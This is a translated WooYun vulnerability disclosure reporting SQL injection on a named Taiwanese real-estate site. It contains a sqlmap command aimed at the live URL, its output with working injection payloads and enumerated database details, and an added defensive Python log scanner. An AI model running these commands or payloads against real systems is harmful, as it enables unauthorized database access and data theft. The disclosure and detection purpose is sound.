Vulnerability summary

Defect ID: wooyun-2015-099565

Title: SQL Injection at a Taiwanese real-estate developer

Vendor: Hitcon Taiwan Internet Vulnerability Reporting Platform

Author: 路人甲

Submitted: 2015-03-05 14:54

Fixed: 2015-03-10 14:56

Published: 2015-03-10 14:56

Vulnerability type: SQL injection

Severity: High

Self-assessed Rank: 18

Status: Handed over to a third-party partner (Hitcon Taiwan Internet Vulnerability Reporting Platform) for handling

Source: http://www.wooyun.org; for questions or help contact [email protected]



Vulnerability details

Disclosure status:

2015-03-05: Details reported to the vendor; awaiting vendor handling
2015-03-10: Vendor actively ignored the vulnerability; details disclosed to the public

Brief description:

SQL Injection at a Taiwanese real-estate developer

Detailed description:

[Screenshot: QQ截图20150304225514.png]

[Screenshot: QQ截图20150304225524.png]

Proof of vulnerability:

[root@Hacker~]# Sqlmap sqlmap.py -u "http://www.3hlife.com.tw/manage_show.php?desn=15" --dbs --passwords --current-user --current-db --is-dba
sqlmap/1.0-dev - automatic SQL injection and database takeover tool
http://sqlmap.org
[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state
[*] starting at 22:50:59
[22:51:00] [INFO] testing connection to the target URL
[22:51:01] [INFO] testing if the target URL is stable. This can take a couple of seconds
[22:51:03] [INFO] target URL is stable
[22:51:03] [INFO] testing if GET parameter 'desn' is dynamic
[22:51:03] [INFO] confirming that GET parameter 'desn' is dynamic
[22:51:04] [INFO] GET parameter 'desn' is dynamic
[22:51:07] [INFO] heuristic (basic) test shows that GET parameter 'desn' might be injectable (possible DBMS: 'MySQL')
[22:51:07] [INFO] testing for SQL injection on GET parameter 'desn'
heuristic (parsing) test showed that the back-end DBMS could be 'MySQL'. Do you want to skip test payloads specific for other DBMSes? [Y/n]
do you want to include all tests for 'MySQL' extending provided level (1) and risk (1)? [Y/n]
[22:51:09] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause'
[22:51:10] [WARNING] reflective value(s) found and filtering out
[22:51:12] [INFO] GET parameter 'desn' is 'AND boolean-based blind - WHERE or HAVING clause' injectable
[22:51:12] [INFO] testing 'MySQL >= 5.0 AND error-based - WHERE or HAVING clause'
[22:51:12] [INFO] GET parameter 'desn' is 'MySQL >= 5.0 AND error-based - WHERE or HAVING clause' injectable
[22:51:12] [INFO] testing 'MySQL inline queries'
[22:51:14] [INFO] testing 'MySQL > 5.0.11 stacked queries'
[22:51:14] [WARNING] time-based comparison needs larger statistical model. Making a few dummy requests, please wait..
[22:51:20] [CRITICAL] there is considerable lagging in connection response(s). Please use as high value for option '--time-sec' as possible (e.g. 10 or more)
[22:51:20] [INFO] testing 'MySQL < 5.0.12 stacked queries (heavy query)'
[22:51:20] [INFO] testing 'MySQL > 5.0.11 AND time-based blind'
[22:52:10] [INFO] GET parameter 'desn' is 'MySQL > 5.0.11 AND time-based blind' injectable
[22:52:10] [INFO] testing 'MySQL UNION query (NULL) - 1 to 20 columns'
[22:52:10] [INFO] automatically extending ranges for UNION query injection technique tests as there is at least one other (potential) technique found
[22:52:12] [INFO] ORDER BY technique seems to be usable. This should reduce the time needed to find the right number of query columns. Automatically extending the range for
[22:52:14] [INFO] target URL appears to have 9 columns in query
[22:52:37] [INFO] GET parameter 'desn' is 'MySQL UNION query (NULL) - 1 to 20 columns' injectable
[22:52:39] [WARNING] automatically patching output having last char trimmed
GET parameter 'desn' is vulnerable. Do you want to keep testing the others (if any)? [y/N] n
sqlmap identified the following injection points with a total of 28 HTTP(s) requests:
---
Place: GET
Parameter: desn
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: desn=15 AND 4977=4977
Type: error-based
Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause
Payload: desn=15 AND (SELECT 3559 FROM(SELECT COUNT(*),CONCAT(0x71676e6471,(SELECT (CASE WHEN (3559=3559) THEN 1 ELSE 0 END)),0x716b756a71,FLOOR(RAND(0)*2))x FROM INFOR
Type: UNION query
Title: MySQL UNION query (NULL) - 9 columns
Payload: desn=15 UNION ALL SELECT NULL,NULL,CONCAT(0x71676e6471,0x636646596f6c48594b75,0x716b756a71),NULL,NULL,NULL,NULL,NULL,NULL#
Type: AND/OR time-based blind
Title: MySQL > 5.0.11 AND time-based blind
Payload: desn=15 AND SLEEP(5)
---
[22:53:02] [INFO] the back-end DBMS is MySQL
web application technology: Apache
back-end DBMS: MySQL 5.0
[22:53:02] [INFO] fetching current user
current user: 'hlife3@%'
[22:53:03] [INFO] fetching current database
current database: 'hlife3'
[22:53:04] [INFO] testing if current user is DBA
[22:53:04] [INFO] fetching current user
[22:53:05] [WARNING] in case of continuous data retrieval problems you are advised to try a switch '--no-cast' or switch '--hex'
current user is DBA: False
[22:53:05] [INFO] fetching database users password hashes
[22:53:08] [WARNING] something went wrong with full UNION technique (most probably because of limitation on retrieved number of entries). Falling back to partial UNION tech
[22:53:08] [WARNING] the SQL query provided does not return any output
[22:53:14] [WARNING] the SQL query provided does not return any output
[22:53:14] [INFO] fetching database users
[22:53:15] [INFO] fetching number of password hashes for user 'hlife3'
[22:53:15] [WARNING] running in a single-thread mode. Please consider usage of option '--threads' for faster data retrieval
[22:53:15] [INFO] retrieved:
[22:53:19] [INFO] retrieved:
[22:53:19] [WARNING] it is very important not to stress the network adapter's bandwidth during usage of time-based payloads
[22:53:25] [WARNING] unable to retrieve the number of password hashes for user 'hlife3'
[22:53:25] [ERROR] unable to retrieve the password hashes for the database users (most probably because the session user has no read privileges over the relevant system dat
[22:53:25] [INFO] fetching database names
available databases [2]:
[*] hlife3
[*] information_schema
[22:53:26] [WARNING] cannot properly display Unicode characters inside Windows OS command prompt (http://bugs.python.org/issue1602). All unhandled occurances will result in
[22:53:26] [INFO] fetched data logged to text files under 'C:\Users\ADMINI~1\Desktop\???~1\???~1\SQLMAP~1.4\Bin\output\www.3hlife.com.tw'
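As an added defender-side example (not part of the report), the following Python scans web-server access logs for requests to manage_show.php whose desn value is not a bare integer and classifies them by the payload families sqlmap listed above (boolean-based, time-based, UNION); the log lines are constructed, and the error-based payload is left out because the report truncates it.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Constructed sample Apache access-log lines (not taken from the report); line 1 is a
# legitimate request, the others mirror the payload families sqlmap listed for 'desn'.
SAMPLE_LOG = """\
203.0.113.5 - - [04/Mar/2015:22:50:59 +0800] "GET /manage_show.php?desn=15 HTTP/1.1" 200 5120
203.0.113.5 - - [04/Mar/2015:22:51:09 +0800] "GET /manage_show.php?desn=15%20AND%204977%3D4977 HTTP/1.1" 200 5120
203.0.113.5 - - [04/Mar/2015:22:52:10 +0800] "GET /manage_show.php?desn=15%20AND%20SLEEP(5) HTTP/1.1" 200 5120
203.0.113.5 - - [04/Mar/2015:22:52:37 +0800] "GET /manage_show.php?desn=15%20UNION%20ALL%20SELECT%20NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL%23 HTTP/1.1" 200 5300
"""

REQUEST_RE = re.compile(r'"(?:GET|POST) (\S+) HTTP/[\d.]+"')

# Ordered checks: the first matching family is reported. 'desn' is an integer
# record id, so anything that is not a bare integer is suspicious to begin with.
FAMILIES = [
    ("time-based blind", re.compile(r"\b(?:SLEEP|BENCHMARK)\s*\(", re.I)),
    ("UNION query", re.compile(r"\bUNION\b.*\bSELECT\b", re.I | re.S)),
    ("boolean-based blind", re.compile(r"\b(?:AND|OR)\b\s+(\d+)\s*=\s*\1\b", re.I)),
]

def classify_desn(value):
    """Return None for a clean integer id, otherwise the injection family name."""
    if re.fullmatch(r"\d+", value):
        return None
    for name, pattern in FAMILIES:
        if pattern.search(value):
            return name
    return "non-numeric (unclassified)"

def scan_log(text):
    """Return (client ip, decoded desn value, family) for every tampered manage_show.php hit."""
    hits = []
    for line in text.splitlines():
        m = REQUEST_RE.search(line)
        if not m:
            continue
        url = urlsplit(m.group(1))
        if not url.path.endswith("/manage_show.php"):
            continue
        for desn in parse_qs(url.query).get("desn", []):   # parse_qs URL-decodes the value
            family = classify_desn(desn)
            if family:
                hits.append((line.split()[0], desn, family))
    return hits

if __name__ == "__main__":
    for ip, value, family in scan_log(SAMPLE_LOG):
        print(f"{ip}  {family:<22} desn={value!r}")
```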

Fix recommendation:

null

Copyright notice: please credit the source when republishing: 路人甲@乌云


Vulnerability response

Vendor response:

Severity: No impact, vendor ignored

Ignored at: 2015-03-10 14:56

Vendor reply:

Latest status:

None yet